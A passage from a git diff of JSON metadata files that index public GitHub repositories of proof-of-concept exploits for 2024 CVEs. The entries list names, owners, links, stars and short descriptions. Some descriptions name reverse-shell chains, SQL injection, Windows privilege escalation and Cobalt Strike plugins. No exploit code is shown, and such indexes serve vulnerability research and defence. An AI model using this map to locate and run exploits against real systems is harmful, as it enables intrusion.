"has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 912544022, + "name": "CVE-2024-25641", + "full_name": "D3Ext\/CVE-2024-25641", + "owner": { + "login": "D3Ext", + "id": 67125397, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67125397?v=4", + "html_url": "https:\/\/github.com\/D3Ext", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/D3Ext\/CVE-2024-25641", + "description": "POC exploit for CVE-2024-25641", + "fork": false, + "created_at": "2025-01-05T21:33:18Z", + "updated_at": "2025-01-06T22:33:40Z", + "pushed_at": "2025-01-06T18:50:17Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-25723.json b/2024/CVE-2024-25723.json new file mode 100644 index 0000000000..de0f5d141b --- /dev/null +++ b/2024/CVE-2024-25723.json @@ -0,0 +1,33 @@ +[ + { + "id": 774682652, + "name": "exploit-CVE-2024-25723", + "full_name": "david-botelho-mariano\/exploit-CVE-2024-25723", + "owner": { + "login": "david-botelho-mariano", + "id": 48680041, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48680041?v=4", + "html_url": "https:\/\/github.com\/david-botelho-mariano", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/david-botelho-mariano\/exploit-CVE-2024-25723", + "description": null, + "fork": false, + "created_at": "2024-03-20T01:28:09Z", + "updated_at": "2024-11-20T16:30:42Z", + "pushed_at": "2024-04-02T20:05:58Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-25731.json b/2024/CVE-2024-25731.json new file mode 100644 index 0000000000..b8f74f5a89 --- /dev/null +++ b/2024/CVE-2024-25731.json @@ -0,0 +1,35 @@ +[ + { + "id": 753419294, + "name": "com.cn.dq.ipc", + "full_name": "actuator\/com.cn.dq.ipc", + "owner": { + "login": "actuator", + "id": 78701239, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78701239?v=4", + "html_url": "https:\/\/github.com\/actuator", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/actuator\/com.cn.dq.ipc", + "description": "CVE-2024-25731", + "fork": false, + "created_at": "2024-02-06T04:38:12Z", + "updated_at": "2024-09-26T23:51:13Z", + "pushed_at": "2024-09-26T23:51:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-25731" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-25733.json b/2024/CVE-2024-25733.json new file mode 100644 index 0000000000..2470b3c1ee --- /dev/null +++ b/2024/CVE-2024-25733.json @@ -0,0 +1,33 @@ +[ + { + "id": 783055366, + "name": "ARC-Browser-Address-Bar-Spoofing-PoC", + "full_name": "hackintoanetwork\/ARC-Browser-Address-Bar-Spoofing-PoC", + "owner": { + "login": "hackintoanetwork", + "id": 83481196, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83481196?v=4", + "html_url": "https:\/\/github.com\/hackintoanetwork", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hackintoanetwork\/ARC-Browser-Address-Bar-Spoofing-PoC", + "description": "CVE-2024-25733 | ARC Browser Address Bar Spoofing PoC - iOS\/iPadOS", + "fork": false, + "created_at": "2024-04-06T20:18:15Z", + "updated_at": "2024-10-23T14:48:12Z", + "pushed_at": "2024-04-06T20:37:23Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-25809.json b/2024/CVE-2024-25809.json new file mode 100644 index 0000000000..43458f2519 --- /dev/null +++ b/2024/CVE-2024-25809.json @@ -0,0 +1,33 @@ +[ + { + "id": 758901582, + "name": "CVE-2024-25809", + "full_name": "sajaljat\/CVE-2024-25809", + "owner": { + "login": "sajaljat", + "id": 142223862, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/142223862?v=4", + "html_url": "https:\/\/github.com\/sajaljat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sajaljat\/CVE-2024-25809", + "description": "(XSS)", + "fork": false, + "created_at": "2024-02-17T12:16:29Z", + "updated_at": "2024-02-17T12:16:29Z", + "pushed_at": "2024-02-17T12:17:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-25832.json b/2024/CVE-2024-25832.json new file mode 100644 index 0000000000..1749d9b509 --- /dev/null +++ b/2024/CVE-2024-25832.json @@ -0,0 +1,42 @@ +[ + { + "id": 767883110, + "name": "CVE-2024-25832-PoC", + "full_name": "0xNslabs\/CVE-2024-25832-PoC", + "owner": { + "login": "0xNslabs", + "id": 122338332, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122338332?v=4", + "html_url": "https:\/\/github.com\/0xNslabs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xNslabs\/CVE-2024-25832-PoC", + "description": "PoC Script for CVE-2024-25832: Exploit chain reverse shell, information disclosure (root password leak) + unrestricted file upload in DataCube3", + "fork": false, + "created_at": "2024-03-06T04:11:59Z", + "updated_at": "2024-03-20T18:09:07Z", + "pushed_at": "2024-03-06T04:32:54Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "command-injection", + "cve", + "cve-2024-25830", + "cve-2024-25832", + "exploit", + "iot-security", + "reverse-shell", + "vulnerability" + ], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-25897.json b/2024/CVE-2024-25897.json new file mode 100644 index 0000000000..ee34cbc857 --- /dev/null +++ b/2024/CVE-2024-25897.json @@ -0,0 +1,33 @@ +[ + { + "id": 839988308, + "name": "CVE-2024-25897", + "full_name": "i-100-user\/CVE-2024-25897", + "owner": { + "login": "i-100-user", + "id": 171415197, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/171415197?v=4", + "html_url": "https:\/\/github.com\/i-100-user", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/i-100-user\/CVE-2024-25897", + "description": "exploit que vulnera Jenkins hecho en Python ", + "fork": false, + "created_at": "2024-08-08T18:21:44Z", + "updated_at": "2024-11-20T16:31:00Z", + "pushed_at": "2024-08-09T00:09:48Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-26026.json b/2024/CVE-2024-26026.json new file mode 100644 index 0000000000..b4080ba1b0 --- /dev/null +++ b/2024/CVE-2024-26026.json @@ -0,0 +1,64 @@ +[ + { + "id": 798069514, + "name": "CVE-2024-26026", + "full_name": "passwa11\/CVE-2024-26026", + "owner": { + "login": "passwa11", + "id": 112363374, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112363374?v=4", + "html_url": "https:\/\/github.com\/passwa11", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/passwa11\/CVE-2024-26026", + "description": "CVE-2024-26026: BIG-IP Next Central Manager API UNAUTHENTICATED SQL INJECTION", + "fork": false, + "created_at": "2024-05-09T03:14:14Z", + "updated_at": "2024-06-26T02:14:55Z", + "pushed_at": "2024-05-09T03:15:03Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 800194422, + "name": "Big-IP-Next-CVE-2024-26026", + "full_name": "GRTMALDET\/Big-IP-Next-CVE-2024-26026", + "owner": { + "login": "GRTMALDET", + "id": 129352872, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129352872?v=4", + "html_url": "https:\/\/github.com\/GRTMALDET", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/GRTMALDET\/Big-IP-Next-CVE-2024-26026", + "description": null, + "fork": false, + "created_at": "2024-05-13T22:04:01Z", + "updated_at": "2024-05-13T22:06:08Z", + "pushed_at": "2024-05-13T22:06:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-26144.json b/2024/CVE-2024-26144.json new file mode 100644 index 0000000000..01bc0738c5 --- /dev/null +++ b/2024/CVE-2024-26144.json @@ -0,0 +1,33 @@ +[ + { + "id": 805249288, + "name": "CVE-2024-26144-test", + "full_name": "gmo-ierae\/CVE-2024-26144-test", + "owner": { + "login": "gmo-ierae", + "id": 137259531, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/137259531?v=4", + "html_url": "https:\/\/github.com\/gmo-ierae", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gmo-ierae\/CVE-2024-26144-test", + "description": null, + "fork": false, + "created_at": "2024-05-24T07:26:40Z", + "updated_at": "2024-07-08T07:47:42Z", + "pushed_at": "2024-07-03T01:09:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 11 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-26160.json b/2024/CVE-2024-26160.json new file mode 100644 index 0000000000..b37c07c7e4 --- /dev/null +++ b/2024/CVE-2024-26160.json @@ -0,0 +1,33 @@ +[ + { + "id": 868851090, + "name": "CVE-2024-26160", + "full_name": "CrackerCat\/CVE-2024-26160", + "owner": { + "login": "CrackerCat", + "id": 17995064, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17995064?v=4", + "html_url": "https:\/\/github.com\/CrackerCat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CrackerCat\/CVE-2024-26160", + "description": "cldflt.sys information disclosure vulnerability (KB5034765 - KB5035853, Win 11).", + "fork": false, + "created_at": "2024-10-07T09:46:09Z", + "updated_at": "2024-10-07T09:46:09Z", + "pushed_at": "2024-10-04T00:14:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-26218.json b/2024/CVE-2024-26218.json new file mode 100644 index 0000000000..aed31a4d2e --- /dev/null +++ b/2024/CVE-2024-26218.json @@ -0,0 +1,33 @@ +[ + { + "id": 792427388, + "name": "CVE-2024-26218", + "full_name": "exploits-forsale\/CVE-2024-26218", + "owner": { + "login": "exploits-forsale", + "id": 168065072, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/168065072?v=4", + "html_url": "https:\/\/github.com\/exploits-forsale", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/exploits-forsale\/CVE-2024-26218", + "description": "Proof-of-Concept for CVE-2024-26218", + "fork": false, + "created_at": "2024-04-26T16:41:04Z", + "updated_at": "2024-12-02T19:45:04Z", + "pushed_at": "2024-04-26T16:46:15Z", + "stargazers_count": 49, + "watchers_count": 49, + "has_discussions": false, + "forks_count": 16, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 16, + "watchers": 49, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-26229.json b/2024/CVE-2024-26229.json new file mode 100644 index 0000000000..7869a9f0b8 --- /dev/null +++ b/2024/CVE-2024-26229.json @@ -0,0 +1,188 @@ +[ + { + "id": 813202333, + "name": "CVE-2024-26229", + "full_name": "varwara\/CVE-2024-26229", + "owner": { + "login": "varwara", + "id": 167913816, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/167913816?v=4", + "html_url": "https:\/\/github.com\/varwara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/varwara\/CVE-2024-26229", + "description": "CWE-781: Improper Address Validation in IOCTL with METHOD_NEITHER I\/O Control Code", + "fork": false, + "created_at": "2024-06-10T17:02:03Z", + "updated_at": "2025-01-03T07:18:37Z", + "pushed_at": "2024-07-04T10:39:15Z", + "stargazers_count": 330, + "watchers_count": 330, + "has_discussions": false, + "forks_count": 63, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 63, + "watchers": 330, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 813503450, + "name": "CVE-2024-26229-exploit", + "full_name": "RalfHacker\/CVE-2024-26229-exploit", + "owner": { + "login": "RalfHacker", + "id": 54005327, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54005327?v=4", + "html_url": "https:\/\/github.com\/RalfHacker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RalfHacker\/CVE-2024-26229-exploit", + "description": "Windows LPE", + "fork": false, + "created_at": "2024-06-11T08:03:29Z", + "updated_at": "2025-01-06T11:32:04Z", + "pushed_at": "2024-06-11T20:41:59Z", + "stargazers_count": 114, + "watchers_count": 114, + "has_discussions": false, + "forks_count": 23, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 23, + "watchers": 114, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 814637832, + "name": "CVE-2024-26229-BOF", + "full_name": "apkc\/CVE-2024-26229-BOF", + "owner": { + "login": "apkc", + "id": 18083944, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18083944?v=4", + "html_url": "https:\/\/github.com\/apkc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/apkc\/CVE-2024-26229-BOF", + "description": "BOF implementations of CVE-2024-26229 for Cobalt Strike and BruteRatel", + "fork": false, + "created_at": "2024-06-13T11:57:50Z", + "updated_at": "2024-12-21T12:43:14Z", + "pushed_at": "2024-06-13T07:30:48Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 32, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 32, + "watchers": 17, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 815768749, + "name": "CVE-2024-26229", + "full_name": "team-MineDEV\/CVE-2024-26229", + "owner": { + "login": "team-MineDEV", + "id": 149191616, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149191616?v=4", + "html_url": "https:\/\/github.com\/team-MineDEV", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/team-MineDEV\/CVE-2024-26229", + "description": "Windows CSC服务特权提升漏洞。 当程序向缓冲区写入的数据超出其处理能力时,就会发生基于堆的缓冲区溢出,从而导致多余的数据溢出到相邻的内存区域。这种溢出会损坏内存,并可能使攻击者能够执行任意代码或未经授权访问系统。本质上,攻击者可以编写触发溢出的恶意代码或输入,从而控制受影响的系统、执行任意命令、安装恶意软件或访问敏感数据。 微软已发出警告成功利用此漏洞的攻击者可以获得 SYSTEM 权限,这是 Windows 系统上的最高访问级别。这增加了与 CVE-2024-26229 相关的风险,使其成为恶意行为者的主要目标。", + "fork": false, + "created_at": "2024-06-16T05:06:31Z", + "updated_at": "2024-11-02T06:09:23Z", + "pushed_at": "2024-06-16T05:29:26Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 838016004, + "name": "eop24-26229", + "full_name": "Cracked5pider\/eop24-26229", + "owner": { + "login": "Cracked5pider", + "id": 51360176, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51360176?v=4", + "html_url": "https:\/\/github.com\/Cracked5pider", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cracked5pider\/eop24-26229", + "description": "A firebeam plugin that exploits the CVE-2024-26229 vulnerability to perform elevation of privilege from a unprivileged user", + "fork": false, + "created_at": "2024-08-04T17:40:51Z", + "updated_at": "2024-12-30T21:23:56Z", + "pushed_at": "2024-08-15T10:48:05Z", + "stargazers_count": 36, + "watchers_count": 36, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 36, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 871953279, + "name": "CVE-2024-26229", + "full_name": "mqxmm\/CVE-2024-26229", + "owner": { + "login": "mqxmm", + "id": 79595418, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79595418?v=4", + "html_url": "https:\/\/github.com\/mqxmm", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mqxmm\/CVE-2024-26229", + "description": null, + "fork": false, + "created_at": "2024-10-13T12:10:35Z", + "updated_at": "2024-10-13T12:11:24Z", + "pushed_at": "2024-10-13T12:11:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-26230.json b/2024/CVE-2024-26230.json new file mode 100644 index 0000000000..2bc33c5744 --- /dev/null +++ b/2024/CVE-2024-26230.json @@ -0,0 +1,64 @@ +[ + { + "id": 785035412, + "name": "CVE-2024-26230", + "full_name": "kiwids0220\/CVE-2024-26230", + "owner": { + "login": "kiwids0220", + "id": 60630639, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60630639?v=4", + "html_url": "https:\/\/github.com\/kiwids0220", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kiwids0220\/CVE-2024-26230", + "description": null, + "fork": false, + "created_at": "2024-04-11T03:59:28Z", + "updated_at": "2024-12-22T15:07:10Z", + "pushed_at": "2024-08-09T15:02:24Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 848915075, + "name": "CVE-2024-26230", + "full_name": "Wa1nut4\/CVE-2024-26230", + "owner": { + "login": "Wa1nut4", + "id": 178184386, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/178184386?v=4", + "html_url": "https:\/\/github.com\/Wa1nut4", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Wa1nut4\/CVE-2024-26230", + "description": "LPE of CVE-2024-26230", + "fork": false, + "created_at": "2024-08-28T16:31:26Z", + "updated_at": "2024-11-19T10:36:20Z", + "pushed_at": "2024-09-01T07:03:46Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 20, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-26304.json b/2024/CVE-2024-26304.json new file mode 100644 index 0000000000..e8c9646b7c --- /dev/null +++ b/2024/CVE-2024-26304.json @@ -0,0 +1,33 @@ +[ + { + "id": 867909796, + "name": "CVE-2024-26304-RCE-exploit", + "full_name": "X-Projetion\/CVE-2024-26304-RCE-exploit", + "owner": { + "login": "X-Projetion", + "id": 161194427, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/161194427?v=4", + "html_url": "https:\/\/github.com\/X-Projetion", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/X-Projetion\/CVE-2024-26304-RCE-exploit", + "description": "CVE-2024-26304 is a critical vulnerability (CVSS score of 9.8) affecting ArubaOS", + "fork": false, + "created_at": "2024-10-05T01:38:36Z", + "updated_at": "2024-10-21T06:16:38Z", + "pushed_at": "2024-10-05T01:51:59Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-26308.json b/2024/CVE-2024-26308.json new file mode 100644 index 0000000000..8293b3f564 --- /dev/null +++ b/2024/CVE-2024-26308.json @@ -0,0 +1,33 @@ +[ + { + "id": 841056629, + "name": "cve", + "full_name": "crazycatMyopic\/cve", + "owner": { + "login": "crazycatMyopic", + "id": 70164315, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70164315?v=4", + "html_url": "https:\/\/github.com\/crazycatMyopic", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/crazycatMyopic\/cve", + "description": "Docker Deskop giving issue CVE-2024-26308 for maven [reproduce]", + "fork": false, + "created_at": "2024-08-11T14:10:14Z", + "updated_at": "2024-08-11T20:25:10Z", + "pushed_at": "2024-08-11T20:25:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-26475.json b/2024/CVE-2024-26475.json new file mode 100644 index 0000000000..5e79759fc2 --- /dev/null +++ b/2024/CVE-2024-26475.json @@ -0,0 +1,33 @@ +[ + { + "id": 770100852, + "name": "CVE-2024-26475", + "full_name": "TronciuVlad\/CVE-2024-26475", + "owner": { + "login": "TronciuVlad", + "id": 105599724, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105599724?v=4", + "html_url": "https:\/\/github.com\/TronciuVlad", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TronciuVlad\/CVE-2024-26475", + "description": "An issue in radareorg radare2 v.0.9.7 through v.5.8.6 and fixed in v.5.8.8 allows a local attacker to cause a denial of service via the grub_sfs_read_extent function.", + "fork": false, + "created_at": "2024-03-10T22:51:05Z", + "updated_at": "2024-05-12T19:45:47Z", + "pushed_at": "2024-03-10T23:44:06Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-26503.json b/2024/CVE-2024-26503.json new file mode 100644 index 0000000000..d1aced6167 --- /dev/null +++ b/2024/CVE-2024-26503.json @@ -0,0 +1,38 @@ +[ + { + "id": 772568314, + "name": "Exploit-CVE-2024-26503", + "full_name": "RoboGR00t\/Exploit-CVE-2024-26503", + "owner": { + "login": "RoboGR00t", + "id": 40581998, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40581998?v=4", + "html_url": "https:\/\/github.com\/RoboGR00t", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RoboGR00t\/Exploit-CVE-2024-26503", + "description": "Exploit for Open eClass – CVE-2024-26503: Unrestricted File Upload Leads to Remote Code Execution", + "fork": false, + "created_at": "2024-03-15T13:01:43Z", + "updated_at": "2024-03-19T07:33:51Z", + "pushed_at": "2024-03-15T13:15:36Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-26503", + "exploit", + "openeclass", + "rce" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-26521.json b/2024/CVE-2024-26521.json new file mode 100644 index 0000000000..2005af76ae --- /dev/null +++ b/2024/CVE-2024-26521.json @@ -0,0 +1,33 @@ +[ + { + "id": 758345985, + "name": "CVE-2024-26521", + "full_name": "hackervegas001\/CVE-2024-26521", + "owner": { + "login": "hackervegas001", + "id": 109858877, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/109858877?v=4", + "html_url": "https:\/\/github.com\/hackervegas001", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hackervegas001\/CVE-2024-26521", + "description": "Html Injection vulnearbility in CE-Phoenix-v1.0.8.20 where malicious HTML code is inserted into a website. This can lead to a variety of issues, from minor website defacement to serious data breaches.", + "fork": false, + "created_at": "2024-02-16T05:40:33Z", + "updated_at": "2024-05-12T17:50:42Z", + "pushed_at": "2024-03-02T11:16:34Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-26534.json b/2024/CVE-2024-26534.json new file mode 100644 index 0000000000..35019f7a0c --- /dev/null +++ b/2024/CVE-2024-26534.json @@ -0,0 +1,33 @@ +[ + { + "id": 763493353, + "name": "CVE-2024-26534", + "full_name": "sajaljat\/CVE-2024-26534", + "owner": { + "login": "sajaljat", + "id": 142223862, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/142223862?v=4", + "html_url": "https:\/\/github.com\/sajaljat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sajaljat\/CVE-2024-26534", + "description": null, + "fork": false, + "created_at": "2024-02-26T11:59:59Z", + "updated_at": "2024-02-26T12:00:00Z", + "pushed_at": "2024-02-26T12:01:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-26535.json b/2024/CVE-2024-26535.json new file mode 100644 index 0000000000..8f55ddf226 --- /dev/null +++ b/2024/CVE-2024-26535.json @@ -0,0 +1,33 @@ +[ + { + "id": 763494179, + "name": "CVE-2024-26535", + "full_name": "sajaljat\/CVE-2024-26535", + "owner": { + "login": "sajaljat", + "id": 142223862, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/142223862?v=4", + "html_url": "https:\/\/github.com\/sajaljat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sajaljat\/CVE-2024-26535", + "description": "(XSS)", + "fork": false, + "created_at": "2024-02-26T12:02:10Z", + "updated_at": "2024-02-26T12:02:10Z", + "pushed_at": "2024-02-26T12:02:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-26560.json b/2024/CVE-2024-26560.json new file mode 100644 index 0000000000..faee1d15b4 --- /dev/null +++ b/2024/CVE-2024-26560.json @@ -0,0 +1,33 @@ +[ + { + "id": 763494836, + "name": "CVE-2024-26560", + "full_name": "sajaljat\/CVE-2024-26560", + "owner": { + "login": "sajaljat", + "id": 142223862, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/142223862?v=4", + "html_url": "https:\/\/github.com\/sajaljat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sajaljat\/CVE-2024-26560", + "description": "(XSS)", + "fork": false, + "created_at": "2024-02-26T12:03:43Z", + "updated_at": "2024-02-26T12:03:44Z", + "pushed_at": "2024-02-26T12:04:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-26574.json b/2024/CVE-2024-26574.json new file mode 100644 index 0000000000..612d2ac579 --- /dev/null +++ 